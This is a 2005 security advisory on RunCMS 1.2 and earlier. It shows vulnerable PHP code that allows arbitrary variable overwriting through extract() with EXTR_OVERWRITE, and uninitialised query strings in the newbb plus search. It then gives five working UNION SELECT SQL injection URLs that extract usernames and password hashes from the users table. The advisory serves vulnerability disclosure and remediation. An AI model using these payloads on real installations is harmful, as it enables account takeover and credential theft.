RunCMS Multiple Vulnerabilities
Vendor: RunCMS
Product: RunCMS
Version: <= 1.2
Website: http://www.runcms.org/
BID: 14631 14634
CVE: CVE-2005-2691 CVE-2005-2692
OSVDB: 18907 18908 18909 18910 18911 18912
SECUNIA: 16514
Description:
RunCMS is a very popular, full featured content management system based on the XOOPS content management system. There are a number of fairly serious vulnerabilities in RunCMS that may allow an attacker to overwrite very important variables used by RunCMS and conduct SQL Injection attacks. A new version of RunCMS has been released some time ago, and all users are advised to upgrade immediately.


Arbitrary Variable Overwriting:
It is possible for an attacker to overwrite arbitrary variables by passing the variables via the POST method. Let's have a look at the vulnerable code in the /includes/common.php script.


// ################# :: Register Globals Compatibility :: #################
$globals_test = @ini_get('register_globals');
if ( isset($globals_test) && empty($globals_test) ) {
// These still need some work :: Cookie|Server|Env are ok now.
if ( !empty($HTTP_GET_VARS) )  { extract($HTTP_GET_VARS, EXTR_SKIP);  }
if ( !empty($HTTP_POST_VARS) ) { extract($HTTP_POST_VARS, EXTR_OVERWRITE); }
define('_GLOBALS', FALSE);
} else {
	define('_GLOBALS', TRUE);
}


In the default php settings register globals is off, but if that is the case here then all of the POST variables are extracted and any existing variables are overwritten. This is especially dangerous because it makes overwriting such variables as the $xoopsConfig array possible. The remedy for this would be to use EXTR_SKIP in place of the EXTR_OVERWRITE argument.


SQL Injection:
There are a number of highly exploitable SQL Injection issues in RunCMS that can be exploited to gain an administrators password hash, and other sensitive information from the underlying database. First we will concentrate on the newbb plus module, and the search engine in particular.

if ( isset($term) && $term != "" ) {

	$terms = split(" ", addslashes($term));
	$addquery .= "(p.post_text LIKE '%$terms[0]%'";
	$subquery .= "(t.topic_title LIKE '%$terms[0]%'";
	if ( $addterms == "any" ) {
		$andor = "OR";
		} else {
			$andor = "AND";
		}
	$size = count($terms);
	for ($i=1; $i<$size; $i++) {
		$addquery.=" $andor p.post_text LIKE '%$terms[$i]%'";
		$subquery.=" $andor t.topic_title LIKE '%$terms[$i]%'";
	}
	$addquery.=")";
	$subquery.=")";
}

When submitting a search the $addquery and $subquery variables can be prefixed with malicious query data because they are never initialized before being added to. This works regardless of register globals settings due to the previously mentioned code in /includes/common.php that extracts all GET/POST variables into global variables. In addition to these SQL Injection issues are several other equally as dangerous SQL Injection issues in both newbb plus and the messages module included in the core RunCMS package.

http://runcms/modules/newbb_plus/newtopic.php?forum=-99%20UNION%20SELECT%201,1,1,1
,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201/*


http://runcms/modules/newbb_plus/edit.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1
,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20runcms_users%20WHERE%201/*&post_id=2'&topic_id=2
&viewmode=flat&order=0

http://runcms/modules/newbb_plus/reply.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201/*&post_id=2&topic_i
d=2&viewmode=flat&order=0

http://runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1
,1,pass%20FROM%20runcms_users%20WHERE%201/*&op=print_pn

http://runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1
,1,pass%20FROM%20runcms_users%20WHERE%201/*&op=print_sent_pn

The above examples will work in the default php settings of register globals off and magic quotes gpc off. Of course for the above examples to work you must specify the correct path to your RunCMS installation as well as the correct database table prefix assume that one even exists.


Solution:
These issues were somewhat silently patched in mid July. I have just now found out about the patch release after talking to the lead developer, and as far as I can tell there was never an announcement made letting users know why they should upgrade. One good thing is that runCMS now have a security@runcms.org email address.


Credits:
James Bercegay of the GulfTech Security Research Team